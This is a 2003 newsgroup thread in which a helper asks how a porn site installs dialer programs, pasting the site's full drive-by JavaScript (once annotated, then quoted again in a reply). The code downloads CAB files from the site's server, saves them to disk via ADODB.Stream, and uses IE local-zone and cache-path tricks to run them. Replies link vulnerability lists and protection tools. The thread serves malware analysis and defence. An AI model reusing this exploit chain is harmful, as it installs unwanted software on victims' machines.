Hi everyone,

I'm trying to help some people who have been the victims of a pretty suspicious
porn website that installs dialler programs and stuff on their visitors' computers.
The problem is, I know zero about javascript, and am fairly clueless when it comes
to IE exploits too, which they seem to use pretty heavily in this case. I think I
have the general idea about what happens when people open these webpages (CAB-files
get downloaded and executed/installed) but it would be really great if anyone could
help me identify in more detail what the javascript code does and what exploits are
being used.

I'll include three files below. Thanks in advance for any help I can get.

Regards,

/Ragnar (you can mail user "ragnar" at the domain gatorhole dot se)


*** Dump of the HTML file that gets loaded first ***

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 12 Dec 2003 22:10:06 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Wed, 29 Oct 2003 13:15:26 GMT
ETag: "bc1ea0b71e9ec31:a64"
Content-Length: 1130

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<script>
// Writes one cookie via document.cookie.
// name/value: cookie name and value (value is passed through escape()).
// expires:    optional Date; emitted as "; expires=<GMT string>" when truthy.
// path:       optional path attribute, emitted when truthy.
// domain:     optional domain attribute, emitted when truthy.
// No secure/HttpOnly attributes are set; nothing is returned.
function SetCookie (name,value,expires,path,domain) {
document.cookie = name + "=" + escape (value) +
((expires) ? "; expires=" + expires.toGMTString() : "") +
((path) ? "; path=" + path : "") +
((domain) ? "; domain=" + domain : "") ;
}


// Expiry one hour from now (60 * 60 * 1000 ms), applied to the cookie below.
var expdate = new Date ();
expdate.setTime (expdate.getTime() + 60 * 60 * 1000);
// Site-wide (path "/") cookie "infoexec1.0_filename" carrying a '^'-delimited list of
// three .exe names. Nothing on this page reads it back; the consumer is presumably a
// component delivered later (the CAB files fetched by i.js) — not verifiable from here.
SetCookie("infoexec1.0_filename", "^smsdial752.exe^dating762.exe^connecting19.exe^", expdate,
"/");


</script>
<head>
<title>Connecting</title>
</head>

<body bgcolor="#FFFF00" text="#000000">
<table width="300" border="0" align="center" bordercolor="#000000">
<tr>
<td>
<div align="center"><font size="4"><b>Ansluter till H&Aring;RDPORR......</b></font></div>
</td>
</tr>
</table>
<div align="center"><br>

<br>
<a href="connecting19.htm"><font face="Arial, Helvetica, sans-serif" size="4"><b>SL&Auml;PP
IN MIG</b></font></a><br>
<br>

<br>
<br>
<br>
<br>
<br>
<bR>
<script src=i.js></script>
</div>
</body>
</html>




*** Dump of the javascript i.js ***

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 12 Dec 2003 22:13:51 GMT
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 08 Dec 2003 17:23:47 GMT
ETag: "6e6b1bab0bdc31:a64"
Content-Length: 2828

// Remote CAB archive that s1(), __so2() and __so3() all try to fetch.
cabfile="http://www.sexfiles.nu/newdial/info_sex2.cab";
// Off-screen container: an absolutely positioned, visibility:hidden div holding the
// iframe "if1" that s2() later writes its own iframes into, so nothing is visible to the user.
document.write('<div style="position: absolute; visibility: hidden;"><iframe id=if1></iframe></div>')
;

// Shared state, all globals:
//   isopen       - true while the "_search" window handle __bb (opened in s1()) is open; cleared by closes()
//   openinsearch - set in s1() when the direct GetObject/XMLHTTP path throws; selects the "_search" fallback
//   usecache     - set in s1() when ADODB.Stream cannot be instantiated; picks __so3() instead of __so2()
isopen=false;
openinsearch=false;
usecache=false;
// Last-resort path, installed as the window onerror handler at the bottom of this
// file and called from the catch blocks of __so2()/__so3(): writes an <OBJECT> tag
// whose CODEBASE points at a remote CAB, i.e. it relies on the plain OBJECT/CODEBASE
// download mechanism (subject to the browser's ActiveX security settings) rather
// than on any of the tricks used by the other functions.
function generic() {
document.write("<OBJECT CLASSID=clsid:bd11a280-2e73-11cf-b6cf-00aa00a74dae "+
"CODEBASE=http://www.sexfiles.nu/newdial/Info_sex.cab ID=i></OBJECT>");
}

// Issues a synchronous (third argument false) XMLHTTP GET for /scripts/o_inca.htm and
// discards the response. Apparently the point is only to get a copy of that page into
// the browser cache (Content.IE5), where s2()/__so3() later address it as
// "o_inca[1].htm". Every error is swallowed, so callers cannot tell whether it worked.
function dl_o_inca(){
try{
var f2=new ActiveXObject("Microsoft.XMLHTTP");f2.Open("GET","/scripts/o_inca.htm", false); f2
.Send();
} catch(ex) {}
}

// Window onload handler (see "onload=s1" at the end of this file).
// Tries the direct in-page path first; if anything in it throws, switches to the
// "_search"-window fallback driven by __so2() or __so3().
function s1(){
try{
// Opens the local IE cache index file as an HTML document. s2() later reads
// x.body.innerText from this global to recover cache-folder names.
x=GetObject("C:/WINDOWS/Tempor~1/Content.IE5/INDEX.DAT","htmlfile");
// Synchronous fetches whose responses are not used here — apparently only to make
// sure o_inca.htm and the CAB end up in the browser cache.
dl_o_inca();
var f0=new ActiveXObject("Microsoft.XMLHTTP");f0.Open("GET",cabfile, false); f0.Send();
// s2() polls the INDEX.DAT document until it is readable.
setTimeout("s2();",200);
} catch(ex){
// Any failure above (GetObject or ActiveXObject refused, request error, ...)
// selects the fallback path below.
openinsearch=true;
}
// Probe only: s is never used. This just tests whether ADODB.Stream can be
// instantiated, which decides between __so2() (stream available) and __so3().
try{
var s=new ActiveXObject("ADODB.Stream");
} catch(ex){
usecache=true;
}

if (openinsearch){
// Opens the browser's search pane (target "_search") on an empty URL and keeps the
// handle in the global __bb so closes() can shut it again.
__bb=open("http:///","_search");
isopen=true;

if (usecache){
setTimeout("__so3()", 500);
} else {
setTimeout("__so2()", 500);
}
// The pane is closed when this page unloads and, in any case, after 5 seconds.
onunload=closes;
setTimeout("closes()", 5000);
}

}
// Fallback used when ADODB.Stream is available. Navigates the "_search" pane to a
// "file:javascript:" URL; the script carried inside that URL (the long single-quoted
// literal below, which appears line-wrapped in this dump) does the following:
//   1. fetches cabfile with Microsoft.XMLHTTP and writes the response body to disk
//      with ADODB.Stream.SaveToFile as C:\Info_sex2.cab;
//   2. fetches http://www.sexfiles.nu/newdial/I-iframe.HTM the same way and saves it
//      as C:\I.HTM;
//   3. navigates to C:\I.HTM (document.location).
// Slashes inside the embedded URLs are written as %2f, and cabfile is rewritten the
// same way with replace() before being spliced in.
function __so2() {
try{
open('file:javascript:eval(\'s=new ActiveXObject(\"ADODB.Stream\");s.Mode=3;s.Type=1;try{s.Open()
;x=new ActiveXObject(\"Microsoft.XMLHTTP\");x.Open(\"GET\",\"'+cabfile.replace(/[/]/g,"%2f")+'\",0);x
.Send();s.Write(x.responseBody);s.SaveToFile(\"C:%2fInfo_sex2.cab\",2);s.close();}catch(ex){};try{s.o
pen();x.Open(\"GET\",\"http:%2f%2fwww.sexfiles.nu%2fnewdial%2fI-iframe.HTM\",0);x.Send();s.Write(x.re
sponseBody);s.SaveToFile(\"C:%2fI.HTM\",2);s.close();}catch(ex){};;document.location=\"C:%2fI.HTM\"\'
)',"_search");
} catch(ex) {
// If even the open() call fails, shut the pane and drop to the plain OBJECT tag.
closes();
generic();
}
}

// Fallback used when ADODB.Stream is NOT available (usecache). Re-requests
// o_inca.htm and the CAB so cached copies exist, then navigates the "_search" pane
// to a "file:javascript:" URL. The script inside that URL (line-wrapped in this dump):
//   - opens C:\WINDOWS\Tempor~1\Content.IE5\INDEX.DAT via GetObject as an htmlfile,
//   - after 1 s takes 80 characters from offset 30 of its text and extracts
//     8-character [A-Z0-9] tokens (Content.IE5 subfolder names),
//   - writes one <iframe> per folder pointing at the cached "o_inca[1].htm" in it,
//     with all four folder names appended as a '~'-separated query string.
// This is the same construction s2() performs in-page; here it runs inside the pane.
function __so3() {
try{
dl_o_inca();
var f0=new ActiveXObject("Microsoft.XMLHTTP");f0.Open("GET",cabfile, false); f0.Send();
open('file:javascript:var z_;var a="";var ab="%2fo_inca[1].htm%3f";var xxy=GetObject("C:%2fWINDOW
S%2fTempor~1%2fContent.IE5%2fINDEX.DAT","htmlfile");var x=setTimeout("var aa=xxy.body.innerText.subst
r(30,80).match(%2f[A-Z0-9]{8}%2fg);for(i=0;i<4;i++){ab+=\\"~\\"+aa[i]};for(i=0;i<4;i++){a+=\\"<iframe
src=C:%2fWINDOWS%2fTempor~1%2fContent.IE5%2f\\"+aa[i]+ab+\\"><%2fiframe>\\"};document.write(a)",1000
);var z__;',"_search");
} catch(ex) {
// On failure, shut the pane and drop to the plain OBJECT tag.
closes();
generic();
}
}

// Closes the "_search" pane opened in s1() if it is still marked open, and clears
// the flag first so a second call (unload handler plus the 5 s timer) is a no-op.
// Errors from close() are ignored.
function closes(){
if (isopen==true) {
isopen=false;
try{__bb.close()}catch(ex){}
}
}

// Polls until the INDEX.DAT document opened in s1() (global x) is readable, then
// writes four <iframe>s into the hidden iframe "if1" created at the top of this file.
function s2(){
try{
// 80 characters starting at offset 30 of the cache-index text; every 8-character
// upper-case alphanumeric run is taken as a Content.IE5 subfolder name.
aa=x.body.innerText.substr(30,80).match(/[A-Z0-9]{8}/g);
// One iframe per candidate folder, each pointing at the cached "o_inca[1].htm" and
// carrying all four folder names as a '~'-separated query (4*8 + 3 = 35 chars),
// which o_inca.htm reads back from the end of location.href.
// (The identifier "aa" is split across two lines here by the dump's line wrapping.)
a="";for (i=0;i<4;i++)
a+="<iframe src=C:/WINDOWS/Tempor~1/Content.IE5/"+aa[i]+"/o_inca[1].htm?"+aa[0]+"~"+aa[1]+"~"+a
a[2]+"~"+aa[3]+"></iframe>";
if1.document.write(a);
} catch(ex) {
// Any failure (x not loaded yet, fewer than four matches, ...) simply retries every
// 200 ms. There is no retry limit, so this can keep polling for as long as the page lives.
setTimeout("s2();",200);
}
}
// Entry points: s1() runs when the page has loaded; any uncaught script error
// anywhere on the page falls back to generic().
onload=s1;
onerror=generic;




*** Dump of the o_inca.htm file ***

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 12 Dec 2003 22:20:42 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Wed, 03 Dec 2003 16:08:56 GMT
ETag: "fa63e1c0b7b9c31:a64"
Content-Length: 252

<script>
// Recovers the four '~'-separated cache-folder names that s2()/__so3() appended as
// the last 35 characters of this page's URL (4 names * 8 chars + 3 separators).
a=document.location.href.substring(document.location.href.length-35).split('~');
// For each folder name, writes an <OBJECT> whose CODEBASE is a relative path to the
// cached CAB ("../<folder>/info_sex2[1].cab") and whose CLASSID is a made-up value
// given a distinct last digit per index (i). for-in over an array yields the index
// strings and would also pick up any enumerable properties added to Array.prototype.
for (i in a)
document.write('<OBJECT CLASSID=clsid:11111111-1111-1111-1111-11111111111'+i+' CODEBASE="../'+a[i]+
'/info_sex2[1].cab"></OBJECT>');
</script>

Re: Identify these IE exploits? by Kent

Kent
Tue Dec 16 22:36:06 CST 2003

Most of the IE exploits revolve around getting scripting to run in the
My Computer security zone. See
http://www.safecenter.net/umbrellawebv4/DirSvc/security/originality/microsoft_ie/index.html
for a list of 35 vulnerabilities in IE. Post back any decoding you can
make of the descriptions. :-)

Thor Larholm used to publish a list of outstanding IE vulnerabilities,
most of which are Lui Die Yu's, but he signed up with Pivx to sell
software to plug the holes and withdrew his web page to protect his
intellectual property. But you can go to www.pivx.com and download
Quik-Fix to plug a number of these holes. I think it may be the best you
can do at the moment.

I also recommend SpywareGuard as active background anti-spyware
protection.

XP SP2 will greatly reduce the attack surface of RPC/DCOM and scripting
vulnerabilities.

--
Kent W. England, Microsoft MVP for Windows Security



"Ragnar Lonn / Telenordia Internet AB" <prl@aristotle.algonet.se> wrote
in
message news:bro9mv$24b$1@green.tninet.se...
> Hi everyone,
>
> I'm trying to help some people who have been the victims of a pretty
suspicious
> porn website that installs dialler programs and stuff on their
visitors' computers.
> The problem is, I know zero about javascript, and am fairly clueless
when it comes
> to IE exploits too, which they seem to use pretty heavily in this
case. I think I
> have the general idea about what happens when people open these
webpages (CAB-files
> get downloaded and executed/installed) but it would be really great if
anyone could
> help me identify in more detail what the javascript code does and what
exploits are
> being used.


Re: Identify these IE exploits? by Mike

Mike
Wed Dec 17 09:40:39 CST 2003

Ragnar,
Some interesting reading ....... on that dialer.
http://www.kephyr.com/spywarescanner/library/dateregon/index.phtml
http://www.pestpatrol.com/PestInfo/s/sms_dialer.asp
____________________________________________________________
Mike Burgess [MVP Windows Shell\User] http://www.mvps.org/winhelp2002/
Blocking Spyware, Adware, Parasites, Hijackers, Trojans, with a HOSTS file
http://www.mvps.org/winhelp2002/hosts.htm [updated 12-15-03]
Please post replies to this Newsgroup, email address is invalid
--

"Ragnar Lonn / Telenordia Internet AB" <prl@aristotle.algonet.se> wrote in
message news:bro9mv$24b$1@green.tninet.se...
> Hi everyone,
>
> I'm trying to help some people who have been the victims of a pretty
suspicious
> porn website that installs dialler programs and stuff on their visitors'
computers.
> The problem is, I know zero about javascript, and am fairly clueless when
it comes
> to IE exploits too, which they seem to use pretty heavily in this case. I
think I
> have the general idea about what happens when people open these webpages
(CAB-files
> get downloaded and executed/installed) but it would be really great if
anyone could
> help me identify in more detail what the javascript code does and what
exploits are
> being used.
>
> I'll include three files below. Thanks in advance for any help I can get.
>
> Regards,
>
> /Ragnar (you can mail user "ragnar" at the domain gatorhole dot se)
>
>
> *** Dump of the HTL file that gets loaded first ***
>
> HTTP/1.1 200 OK
> Server: Microsoft-IIS/5.0
> X-Powered-By: ASP.NET
> Connection: close
> Date: Fri, 12 Dec 2003 22:10:06 GMT
> Content-Type: text/html
> Accept-Ranges: bytes
> Last-Modified: Wed, 29 Oct 2003 13:15:26 GMT
> ETag: "bc1ea0b71e9ec31:a64"
> Content-Length: 1130
>
> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
>
> <html>
> <script>
> function SetCookie (name,value,expires,path,domain) {
> document.cookie = name + "=" + escape (value) +
> ((expires) ? "; expires=" + expires.toGMTString() : "") +
> ((path) ? "; path=" + path : "") +
> ((domain) ? "; domain=" + domain : "") ;
> }
>
>
> var expdate = new Date ();
> expdate.setTime (expdate.getTime() + 60 * 60 * 1000);
> SetCookie("infoexec1.0_filename",
"^smsdial752.exe^dating762.exe^connecting19.exe^", expdate,
> "/");
>
>
> </script>
> <head>
> <title>Connecting</title>
> </head>
>
> <body bgcolor="#FFFF00" text="#000000">
> <table width="300" border="0" align="center" bordercolor="#000000">
> <tr>
> <td>
> <div align="center"><font size="4"><b>Ansluter till
H&Aring;RDPORR......</b></font></div>
> </td>
> </tr>
> </table>
> <div align="center"><br>
>
> <br>
> <a href="connecting19.htm"><font face="Arial, Helvetica, sans-serif"
size="4"><b>SL&Auml;PP
> IN MIG</b></font></a><br>
> <br>
>
> <br>
> <br>
> <br>
> <br>
> <br>
> <bR>
> <script src=i.js></script>
> </div>
> </body>
> </html>
>
>
>
>
> *** Dump of the javascript i.js ***
>
> HTTP/1.1 200 OK
> Server: Microsoft-IIS/5.0
> X-Powered-By: ASP.NET
> Connection: close
> Date: Fri, 12 Dec 2003 22:13:51 GMT
> Content-Type: application/x-javascript
> Accept-Ranges: bytes
> Last-Modified: Mon, 08 Dec 2003 17:23:47 GMT
> ETag: "6e6b1bab0bdc31:a64"
> Content-Length: 2828
>
> cabfile="http://www.sexfiles.nu/newdial/info_sex2.cab";
> document.write('<div style="position: absolute; visibility:
hidden;"><iframe id=if1></iframe></div>')
> ;
>
> isopen=false;
> openinsearch=false;
> usecache=false;
> function generic() {
> document.write("<OBJECT
CLASSID=clsid:bd11a280-2e73-11cf-b6cf-00aa00a74dae "+
> "CODEBASE=http://www.sexfiles.nu/newdial/Info_sex.cab
ID=i></OBJECT>");
> }
>
> function dl_o_inca(){
> try{
> var f2=new
ActiveXObject("Microsoft.XMLHTTP");f2.Open("GET","/scripts/o_inca.htm",
false); f2
> .Send();
> } catch(ex) {}
> }
>
> function s1(){
> try{
> x=GetObject("C:/WINDOWS/Tempor~1/Content.IE5/INDEX.DAT","htmlfile");
> dl_o_inca();
> var f0=new ActiveXObject("Microsoft.XMLHTTP");f0.Open("GET",cabfile,
false); f0.Send();
> setTimeout("s2();",200);
> } catch(ex){
> openinsearch=true;
> }
> try{
> var s=new ActiveXObject("ADODB.Stream");
> } catch(ex){
> usecache=true;
> }
>
> if (openinsearch){
> __bb=open("http:///","_search");
> isopen=true;
>
> if (usecache){
> setTimeout("__so3()", 500);
> } else {
> setTimeout("__so2()", 500);
> }
> onunload=closes;
> setTimeout("closes()", 5000);
> }
>
> }
> function __so2() {
> try{
> open('file:javascript:eval(\'s=new
ActiveXObject(\"ADODB.Stream\");s.Mode=3;s.Type=1;try{s.Open()
> ;x=new
ActiveXObject(\"Microsoft.XMLHTTP\");x.Open(\"GET\",\"'+cabfile.replace(/[/]
/g,"%2f")+'\",0);x
>
.Send();s.Write(x.responseBody);s.SaveToFile(\"C:%2fInfo_sex2.cab\",2);s.clo
se();}catch(ex){};try{s.o
>
pen();x.Open(\"GET\",\"http:%2f%2fwww.sexfiles.nu%2fnewdial%2fI-iframe.HTM\"
,0);x.Send();s.Write(x.re
>
sponseBody);s.SaveToFile(\"C:%2fI.HTM\",2);s.close();}catch(ex){};;document.
location=\"C:%2fI.HTM\"\'
> )',"_search");
> } catch(ex) {
> closes();
> generic();
> }
> }
>
> function __so3() {
> try{
> dl_o_inca();
> var f0=new ActiveXObject("Microsoft.XMLHTTP");f0.Open("GET",cabfile,
false); f0.Send();
> open('file:javascript:var z_;var a="";var ab="%2fo_inca[1].htm%3f";var
xxy=GetObject("C:%2fWINDOW
> S%2fTempor~1%2fContent.IE5%2fINDEX.DAT","htmlfile");var x=setTimeout("var
aa=xxy.body.innerText.subst
>
r(30,80).match(%2f[A-Z0-9]{8}%2fg);for(i=0;i<4;i++){ab+=\\"~\\"+aa[i]};for(i
=0;i<4;i++){a+=\\"<iframe
>
src=C:%2fWINDOWS%2fTempor~1%2fContent.IE5%2f\\"+aa[i]+ab+\\"><%2fiframe>\\"}
;document.write(a)",1000
> );var z__;',"_search");
> } catch(ex) {
> closes();
> generic();
> }
> }
>
> function closes(){
> if (isopen==true) {
> isopen=false;
> try{__bb.close()}catch(ex){}
> }
> }
>
> function s2(){
> try{
> aa=x.body.innerText.substr(30,80).match(/[A-Z0-9]{8}/g);
> a="";for (i=0;i<4;i++)
> a+="<iframe
src=C:/WINDOWS/Tempor~1/Content.IE5/"+aa[i]+"/o_inca[1].htm?"+aa[0]+"~"+aa[1
]+"~"+a
> a[2]+"~"+aa[3]+"></iframe>";
> if1.document.write(a);
> } catch(ex) {
> setTimeout("s2();",200);
> }
> }
> onload=s1;
> onerror=generic;
>
>
>
>
> *** Dump of the o_inca.htm file ***
>
> HTTP/1.1 200 OK
> Server: Microsoft-IIS/5.0
> X-Powered-By: ASP.NET
> Connection: close
> Date: Fri, 12 Dec 2003 22:20:42 GMT
> Content-Type: text/html
> Accept-Ranges: bytes
> Last-Modified: Wed, 03 Dec 2003 16:08:56 GMT
> ETag: "fa63e1c0b7b9c31:a64"
> Content-Length: 252
>
> <script>
>
a=document.location.href.substring(document.location.href.length-35).split('
~');
> for (i in a)
> document.write('<OBJECT
CLASSID=clsid:11111111-1111-1111-1111-11111111111'+i+' CODEBASE="../'+a[i]+
> '/info_sex2[1].cab"></OBJECT>');
> </script>